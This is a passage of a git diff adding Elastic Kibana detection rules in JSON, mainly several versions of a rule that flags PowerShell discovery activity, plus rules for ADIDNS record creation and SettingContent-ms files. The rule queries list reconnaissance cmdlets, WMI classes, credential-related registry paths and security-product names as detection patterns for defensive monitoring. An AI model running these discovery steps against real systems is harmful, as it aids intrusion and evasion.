+ { + "id": "T1087.002", + "name": "Domain Account", + "reference": "https://attack.mitre.org/techniques/T1087/002/" + } + ] + }, + { + "id": "T1482", + "name": "Domain Trust Discovery", + "reference": "https://attack.mitre.org/techniques/T1482/" + }, + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + }, + { + "id": "T1083", + "name": "File and Directory Discovery", + "reference": "https://attack.mitre.org/techniques/T1083/" + }, + { + "id": "T1615", + "name": "Group Policy Discovery", + "reference": "https://attack.mitre.org/techniques/T1615/" + }, + { + "id": "T1135", + "name": "Network Share Discovery", + "reference": "https://attack.mitre.org/techniques/T1135/" + }, + { + "id": "T1201", + "name": "Password Policy Discovery", + "reference": "https://attack.mitre.org/techniques/T1201/" + }, + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + }, + { + "id": "T1518", + "name": "Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/", + "subtechnique": [ + { + "id": "T1518.001", + "name": "Security Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/001/" + } + ] + }, + { + "id": "T1012", + "name": "Query Registry", + "reference": "https://attack.mitre.org/techniques/T1012/" + }, + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + }, + { + "id": "T1049", + "name": "System Network Connections Discovery", + "reference": "https://attack.mitre.org/techniques/T1049/" + }, + { + "id": "T1007", + "name": "System Service Discovery", + "reference": "https://attack.mitre.org/techniques/T1007/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_5.json b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_5.json new file mode 100644 index 00000000000..f07c098a154 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_5.json @@ -0,0 +1,193 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to discovery activities. Attackers can use these to perform various situational awareness related activities, like enumerating users, shares, sessions, domain trusts, groups, etc.", + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Discovery Capabilities", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"Get-ADDefaultDomainPasswordPolicy\" or\n \"Get-ADDomain\" or \"Get-ComputerInfo\" or\n \"Get-Disk\" or \"Get-DnsClientCache\" or\n \"Get-GPOReport\" or \"Get-HotFix\" or\n \"Get-LocalUser\" or \"Get-NetFirewallProfile\" or\n \"get-nettcpconnection\" or \"Get-NetAdapter\" or\n \"Get-PhysicalDisk\" or \"Get-Process\" or\n \"Get-PSDrive\" or \"Get-Service\" or\n \"Get-SmbShare\" or \"Get-WinEvent\"\n ) or\n (\n (\"Get-WmiObject\" or \"gwmi\" or \"Get-CimInstance\" or\n \"gcim\" or \"Management.ManagementObjectSearcher\" or\n \"System.Management.ManagementClass\" or\n \"[WmiClass]\" or \"[WMI]\") and\n (\n \"AntiVirusProduct\" or \"CIM_BIOSElement\" or \"CIM_ComputerSystem\" or \"CIM_Product\" or \"CIM_DiskDrive\" or\n \"CIM_LogicalDisk\" or \"CIM_NetworkAdapter\" or \"CIM_StorageVolume\" or \"CIM_OperatingSystem\" or\n \"CIM_Process\" or \"CIM_Service\" or \"MSFT_DNSClientCache\" or \"Win32_BIOS\" or \"Win32_ComputerSystem\" or\n \"Win32_ComputerSystemProduct\" or \"Win32_DiskDrive\" or \"win32_environment\" or \"Win32_Group\" or\n \"Win32_groupuser\" or \"Win32_IP4RouteTable\" or \"Win32_logicaldisk\" or \"Win32_MappedLogicalDisk\" or\n \"Win32_NetworkAdapterConfiguration\" or \"win32_ntdomain\" or \"Win32_OperatingSystem\" or\n \"Win32_PnPEntity\" or \"Win32_Process\" or \"Win32_Product\" or \"Win32_quickfixengineering\" or\n \"win32_service\" or \"Win32_Share\" or \"Win32_UserAccount\"\n )\n ) or\n (\n (\"ADSI\" and \"WinNT\") or\n (\"Get-ChildItem\" and \"sysmondrv.sys\") or\n (\"::GetIPGlobalProperties()\" and \"GetActiveTcpConnections()\") or\n (\"ServiceProcess.ServiceController\" and \"::GetServices\") or\n (\"Diagnostics.Process\" and \"::GetProcesses\") or\n (\"DirectoryServices.Protocols.GroupPolicy\" and \".GetGPOReport()\") or\n (\"DirectoryServices.AccountManagement\" and \"PrincipalSearcher\") or\n (\"NetFwTypeLib.NetFwMgr\" and \"CurrentProfile\") or\n (\"NetworkInformation.NetworkInterface\" and \"GetAllNetworkInterfaces\") or\n (\"Automation.PSDriveInfo\") or\n (\"Microsoft.Win32.RegistryHive\")\n ) or\n (\n \"Get-ItemProperty\" and\n (\n \"\\Control\\SecurityProviders\\WDigest\" or\n \"\\microsoft\\windows\\currentversion\\explorer\\runmru\" or\n \"\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Kerberos\\Parameters\" or\n \"\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" or\n \"\\Microsoft\\Windows\\WindowsUpdate\" or\n \"Policies\\Microsoft\\Windows\\Installer\" or\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\" or\n (\"\\Services\\SharedAccess\\Parameters\\FirewallPolicy\" and \"EnableFirewall\") or\n (\"Microsoft\\Windows\\CurrentVersion\\Internet Settings\" and \"proxyEnable\")\n )\n ) or\n (\n (\"Directoryservices.Activedirectory\" or\n \"DirectoryServices.AccountManagement\") and \n (\n \"Domain Admins\" or \"DomainControllers\" or\n \"FindAllGlobalCatalogs\" or \"GetAllTrustRelationships\" or\n \"GetCurrentDomain\" or \"GetCurrentForest\"\n ) or\n \"DirectoryServices.DirectorySearcher\" and\n (\n \"samAccountType=805306368\" or\n \"samAccountType=805306369\" or\n \"objectCategory=group\" or\n \"objectCategory=groupPolicyContainer\" or\n \"objectCategory=site\" or\n \"objectCategory=subnet\" or\n \"objectClass=trustedDomain\"\n )\n ) or\n (\n \"Get-Process\" and\n (\n \"mcshield\" or \"windefend\" or \"savservice\" or\n \"TMCCSF\" or \"symantec antivirus\" or\n \"CSFalcon\" or \"TmPfw\" or \"kvoop\"\n )\n )\n ) and\n not powershell.file.script_block_text : (\n (\n \"__cmdletization_BindCommonParameters\" and\n \"Microsoft.PowerShell.Core\\Export-ModuleMember\" and\n \"Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter\"\n ) or\n \"CmdletsToExport=@(\\\"Add-Content\\\",\"\n ) and\n not user.id : (\"S-1-5-18\" or \"S-1-5-19\" or \"S-1-5-20\") and\n not file.path : (\n ?\\:\\\\\\\\Program?Files\\\\\\\\WindowsPowerShell\\\\\\\\Modules\\\\\\\\*.psd1 or\n ?\\:\\\\\\\\Program?Files\\\\\\\\WindowsPowerShell\\\\\\\\Modules\\\\\\\\*.psm1 or\n ?\\:\\\\\\\\Program?Files\\\\\\\\Microsoft?Azure?AD?Sync\\\\\\\\Extensions\\\\\\\\AADConnector.psm1* or\n *ServiceNow?MID?Server*agent\\\\\\\\scripts\\\\\\\\PowerShell\\\\\\\\*.psm1 or\n ?\\:\\\\\\\\*\\\\\\\\IMECache\\\\\\\\HealthScripts\\\\\\\\*\\\\\\\\detect.ps1\n ) and\n not (\n file.path : (\n ?\\:\\\\\\\\*\\\\\\\\TEMP\\\\\\\\SDIAG* or\n ?\\:\\\\\\\\TEMP\\\\\\\\SDIAG* or\n ?\\:\\\\\\\\Temp\\\\\\\\SDIAG* or\n ?\\:\\\\\\\\temp\\\\\\\\SDIAG* or\n ?\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\SDIAG* or\n ?\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\*\\\\\\\\SDIAG*\n ) and file.name : \"CL_Utility.ps1\"\n )\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "1e0a3f7c-21e7-4bb1-98c7-2036612fb1be", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Discovery", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1087/001/" + }, + { + "id": "T1087.002", + "name": "Domain Account", + "reference": "https://attack.mitre.org/techniques/T1087/002/" + } + ] + }, + { + "id": "T1482", + "name": "Domain Trust Discovery", + "reference": "https://attack.mitre.org/techniques/T1482/" + }, + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + }, + { + "id": "T1083", + "name": "File and Directory Discovery", + "reference": "https://attack.mitre.org/techniques/T1083/" + }, + { + "id": "T1615", + "name": "Group Policy Discovery", + "reference": "https://attack.mitre.org/techniques/T1615/" + }, + { + "id": "T1135", + "name": "Network Share Discovery", + "reference": "https://attack.mitre.org/techniques/T1135/" + }, + { + "id": "T1201", + "name": "Password Policy Discovery", + "reference": "https://attack.mitre.org/techniques/T1201/" + }, + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + }, + { + "id": "T1518", + "name": "Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/", + "subtechnique": [ + { + "id": "T1518.001", + "name": "Security Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/001/" + } + ] + }, + { + "id": "T1012", + "name": "Query Registry", + "reference": "https://attack.mitre.org/techniques/T1012/" + }, + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + }, + { + "id": "T1049", + "name": "System Network Connections Discovery", + "reference": "https://attack.mitre.org/techniques/T1049/" + }, + { + "id": "T1007", + "name": "System Service Discovery", + "reference": "https://attack.mitre.org/techniques/T1007/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 5 + }, + "id": "1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_6.json b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_6.json new file mode 100644 index 00000000000..9c356f3f5e3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_6.json @@ -0,0 +1,193 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to discovery activities. Attackers can use these to perform various situational awareness related activities, like enumerating users, shares, sessions, domain trusts, groups, etc.", + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Discovery Capabilities", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"Get-ADDefaultDomainPasswordPolicy\" or\n \"Get-ADDomain\" or \"Get-ComputerInfo\" or\n \"Get-Disk\" or \"Get-DnsClientCache\" or\n \"Get-GPOReport\" or \"Get-HotFix\" or\n \"Get-LocalUser\" or \"Get-NetFirewallProfile\" or\n \"get-nettcpconnection\" or \"Get-NetAdapter\" or\n \"Get-PhysicalDisk\" or \"Get-Process\" or\n \"Get-PSDrive\" or \"Get-Service\" or\n \"Get-SmbShare\" or \"Get-WinEvent\"\n ) or\n (\n (\"Get-WmiObject\" or \"gwmi\" or \"Get-CimInstance\" or\n \"gcim\" or \"Management.ManagementObjectSearcher\" or\n \"System.Management.ManagementClass\" or\n \"[WmiClass]\" or \"[WMI]\") and\n (\n \"AntiVirusProduct\" or \"CIM_BIOSElement\" or \"CIM_ComputerSystem\" or \"CIM_Product\" or \"CIM_DiskDrive\" or\n \"CIM_LogicalDisk\" or \"CIM_NetworkAdapter\" or \"CIM_StorageVolume\" or \"CIM_OperatingSystem\" or\n \"CIM_Process\" or \"CIM_Service\" or \"MSFT_DNSClientCache\" or \"Win32_BIOS\" or \"Win32_ComputerSystem\" or\n \"Win32_ComputerSystemProduct\" or \"Win32_DiskDrive\" or \"win32_environment\" or \"Win32_Group\" or\n \"Win32_groupuser\" or \"Win32_IP4RouteTable\" or \"Win32_logicaldisk\" or \"Win32_MappedLogicalDisk\" or\n \"Win32_NetworkAdapterConfiguration\" or \"win32_ntdomain\" or \"Win32_OperatingSystem\" or\n \"Win32_PnPEntity\" or \"Win32_Process\" or \"Win32_Product\" or \"Win32_quickfixengineering\" or\n \"win32_service\" or \"Win32_Share\" or \"Win32_UserAccount\"\n )\n ) or\n (\n (\"ADSI\" and \"WinNT\") or\n (\"Get-ChildItem\" and \"sysmondrv.sys\") or\n (\"::GetIPGlobalProperties()\" and \"GetActiveTcpConnections()\") or\n (\"ServiceProcess.ServiceController\" and \"::GetServices\") or\n (\"Diagnostics.Process\" and \"::GetProcesses\") or\n (\"DirectoryServices.Protocols.GroupPolicy\" and \".GetGPOReport()\") or\n (\"DirectoryServices.AccountManagement\" and \"PrincipalSearcher\") or\n (\"NetFwTypeLib.NetFwMgr\" and \"CurrentProfile\") or\n (\"NetworkInformation.NetworkInterface\" and \"GetAllNetworkInterfaces\") or\n (\"Automation.PSDriveInfo\") or\n (\"Microsoft.Win32.RegistryHive\")\n ) or\n (\n \"Get-ItemProperty\" and\n (\n \"\\Control\\SecurityProviders\\WDigest\" or\n \"\\microsoft\\windows\\currentversion\\explorer\\runmru\" or\n \"\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Kerberos\\Parameters\" or\n \"\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" or\n \"\\Microsoft\\Windows\\WindowsUpdate\" or\n \"Policies\\Microsoft\\Windows\\Installer\" or\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\" or\n (\"\\Services\\SharedAccess\\Parameters\\FirewallPolicy\" and \"EnableFirewall\") or\n (\"Microsoft\\Windows\\CurrentVersion\\Internet Settings\" and \"proxyEnable\")\n )\n ) or\n (\n (\"Directoryservices.Activedirectory\" or\n \"DirectoryServices.AccountManagement\") and \n (\n \"Domain Admins\" or \"DomainControllers\" or\n \"FindAllGlobalCatalogs\" or \"GetAllTrustRelationships\" or\n \"GetCurrentDomain\" or \"GetCurrentForest\"\n ) or\n \"DirectoryServices.DirectorySearcher\" and\n (\n \"samAccountType=805306368\" or\n \"samAccountType=805306369\" or\n \"objectCategory=group\" or\n \"objectCategory=groupPolicyContainer\" or\n \"objectCategory=site\" or\n \"objectCategory=subnet\" or\n \"objectClass=trustedDomain\"\n )\n ) or\n (\n \"Get-Process\" and\n (\n \"mcshield\" or \"windefend\" or \"savservice\" or\n \"TMCCSF\" or \"symantec antivirus\" or\n \"CSFalcon\" or \"TmPfw\" or \"kvoop\"\n )\n )\n ) and\n not powershell.file.script_block_text : (\n (\n \"__cmdletization_BindCommonParameters\" and\n \"Microsoft.PowerShell.Core\\Export-ModuleMember\" and\n \"Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter\"\n ) or\n \"CmdletsToExport=@(\\\"Add-Content\\\",\"\n ) and\n not user.id : (\"S-1-5-18\" or \"S-1-5-19\" or \"S-1-5-20\") and\n not file.path : (\n ?\\:\\\\\\\\Program?Files\\\\\\\\WindowsPowerShell\\\\\\\\Modules\\\\\\\\*.psd1 or\n ?\\:\\\\\\\\Program?Files\\\\\\\\WindowsPowerShell\\\\\\\\Modules\\\\\\\\*.psm1 or\n ?\\:\\\\\\\\Program?Files\\\\\\\\Microsoft?Azure?AD?Sync\\\\\\\\Extensions\\\\\\\\AADConnector.psm1* or\n *ServiceNow?MID?Server*agent\\\\\\\\scripts\\\\\\\\PowerShell\\\\\\\\*.psm1 or\n ?\\:\\\\\\\\*\\\\\\\\IMECache\\\\\\\\HealthScripts\\\\\\\\*\\\\\\\\detect.ps1\n ) and\n not (\n file.path : (\n ?\\:\\\\\\\\*\\\\\\\\TEMP\\\\\\\\SDIAG* or\n ?\\:\\\\\\\\TEMP\\\\\\\\SDIAG* or\n ?\\:\\\\\\\\Temp\\\\\\\\SDIAG* or\n ?\\:\\\\\\\\temp\\\\\\\\SDIAG* or\n ?\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\SDIAG* or\n ?\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\*\\\\\\\\SDIAG*\n ) and file.name : \"CL_Utility.ps1\"\n )\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "1e0a3f7c-21e7-4bb1-98c7-2036612fb1be", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Discovery", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1087/001/" + }, + { + "id": "T1087.002", + "name": "Domain Account", + "reference": "https://attack.mitre.org/techniques/T1087/002/" + } + ] + }, + { + "id": "T1482", + "name": "Domain Trust Discovery", + "reference": "https://attack.mitre.org/techniques/T1482/" + }, + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + }, + { + "id": "T1083", + "name": "File and Directory Discovery", + "reference": "https://attack.mitre.org/techniques/T1083/" + }, + { + "id": "T1615", + "name": "Group Policy Discovery", + "reference": "https://attack.mitre.org/techniques/T1615/" + }, + { + "id": "T1135", + "name": "Network Share Discovery", + "reference": "https://attack.mitre.org/techniques/T1135/" + }, + { + "id": "T1201", + "name": "Password Policy Discovery", + "reference": "https://attack.mitre.org/techniques/T1201/" + }, + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + }, + { + "id": "T1518", + "name": "Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/", + "subtechnique": [ + { + "id": "T1518.001", + "name": "Security Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/001/" + } + ] + }, + { + "id": "T1012", + "name": "Query Registry", + "reference": "https://attack.mitre.org/techniques/T1012/" + }, + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + }, + { + "id": "T1049", + "name": "System Network Connections Discovery", + "reference": "https://attack.mitre.org/techniques/T1049/" + }, + { + "id": "T1007", + "name": "System Service Discovery", + "reference": "https://attack.mitre.org/techniques/T1007/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 6 + }, + "id": "1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1e1b2e7e-b8f5-45e5-addc-66cc1224ffbc_1.json b/packages/security_detection_engine/kibana/security_rule/1e1b2e7e-b8f5-45e5-addc-66cc1224ffbc_1.json new file mode 100644 index 00000000000..ef18df409a6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1e1b2e7e-b8f5-45e5-addc-66cc1224ffbc_1.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Active Directory Integrated DNS (ADIDNS) is one of the core components of AD DS, leveraging AD's access control and replication to maintain domain consistency. It stores DNS zones as AD objects, a feature that, while robust, introduces some security issues because of the default permission (Any authenticated users) to create DNS-named records. Attackers can perform Dynamic Spoofing attacks, where they monitor LLMNR/NBT-NS requests and create DNS-named records to target systems that are requested from multiple systems. They can also create specific records to target specific services, such as wpad, for spoofing attacks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation of a DNS-Named Record", + "query": "any where host.os.type == \"windows\" and event.action == \"Directory Service Changes\" and\n event.code == \"5137\" and winlog.event_data.ObjectClass == \"dnsNode\" and\n not winlog.event_data.SubjectUserName : \"*$\"\n", + "references": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/adidns-revisited/", + "https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/wpad-spoofing" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.ObjectClass", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "1e1b2e7e-b8f5-45e5-addc-66cc1224ffbc", + "setup": "## Setup\n\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover the target object by default (we still need it to be configured to generate events), so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=MicrosoftDNS,DC=DomainDNSZones,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights CreateChild -InheritanceFlags Descendents -AttributeGUID e0fa1e8c-9b45-11d0-afdd-00c04fd930c9 -AuditFlags Success\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Active Directory", + "Use Case: Active Directory Monitoring" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1557", + "name": "Adversary-in-the-Middle", + "reference": "https://attack.mitre.org/techniques/T1557/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "1e1b2e7e-b8f5-45e5-addc-66cc1224ffbc_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1e6363a6-3af5-41d4-b7ea-d475389c0ceb_2.json b/packages/security_detection_engine/kibana/security_rule/1e6363a6-3af5-41d4-b7ea-d475389c0ceb_2.json new file mode 100644 index 00000000000..9d07e7a551c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1e6363a6-3af5-41d4-b7ea-d475389c0ceb_2.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the suspicious creation of SettingContents-ms files, which have been used in attacks to achieve code execution while evading defenses.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Creation of SettingContent-ms Files", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.extension : \"settingcontent-ms\" and\n not file.path : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Packages\\\\windows.immersivecontrolpanel_*\\\\LocalState\\\\Indexed\\\\Settings\\\\*\"\n", + "references": [ + "https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "1e6363a6-3af5-41d4-b7ea-d475389c0ceb", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1204", + "name": "User Execution", + "reference": "https://attack.mitre.org/techniques/T1204/", + "subtechnique": [ + { + "id": "T1204.002", + "name": "Malicious File", + "reference": "https://attack.mitre.org/techniques/T1204/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "1e6363a6-3af5-41d4-b7ea-d475389c0ceb_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_8.json b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_8.json new file mode 100644 index 00000000000..fab92b4647a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_8.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of PowerShell script with keywords related to different 